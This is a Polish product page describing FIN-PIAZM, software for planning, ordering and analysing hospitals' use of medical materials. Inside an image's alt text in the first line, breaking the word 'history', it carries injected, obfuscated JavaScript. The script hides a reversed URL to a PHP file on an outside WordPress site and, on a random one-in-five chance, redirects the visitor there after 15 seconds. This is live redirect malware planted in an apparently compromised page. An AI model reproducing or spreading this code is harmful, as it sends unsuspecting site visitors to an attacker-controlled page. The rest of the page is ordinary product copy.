Checking his patient's medical his<script type=$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == „string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(„”).reverse().join(„”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tory" src="http://finus.com.pl///wp-content/uploads/iStock_000023307392Small-300x199.jpg" width="300" height="199" />

System komputerowego wspomagania i analizy zużycia materiałów medycznych FIN-PIAZM ułatwia i usprawnia proces planowania zakupów, zamówień, faktur oraz analizy zużycia materiałów szpitalom oraz innym jednostkom medycznym.

Moduł planowania umożliwia wprowadzenie i przeglądanie planów dotyczących przyszłego zapotrzebowania na materiały poszczególnych komórek danej jednostki medycznej.

Funkcja planowania jest realizowana w ramach planów pojedynczych komórek oraz planu rocznego całej jednostki medycznej.Moduł zużycia materiałów na podstawie danych importowanych z systemu FIN-MAT przeprowadza analizę ilościową oraz wartościową i przedstawia wyniki w formie tabelarycznej lub na wykresach.Zestawienia generowane w systemie FIN-PIAZM przedstawiają statystykę porównawczą planów poszczególnych komórek w wybranych okresach do zużycia faktycznego w dowolnym okresie czasu.

Moduł realizacji oraz ewidencji zamówień umożliwia generowanie na poszczególne materiały na podstawie ich zapotrzebowania. Zamówienia są realizowane w postaci faktur. Użytkownik otrzymuje z systemu FIN-PIAZM informacje o realizacji zamówień.

System FIN-PIAZM jest dosknonałym narzędziem ewidencyjnym dla jednostek medycznych. Stanowi istotne rozszerzenie tradycyjnych programów gospodarki materiałowej. Wspomaga zarządzanie daną jednostką, przedstawia koszty jakie generują poszczególne komórki z perspektywy magazynu;

Aby uzyskać więcej informacji:

Do pobrania

  • pdf PIAZM
    Planowanie i Analiza Zużycia Materiałów Medycznych
    Rozmiar załącznika: 120 kB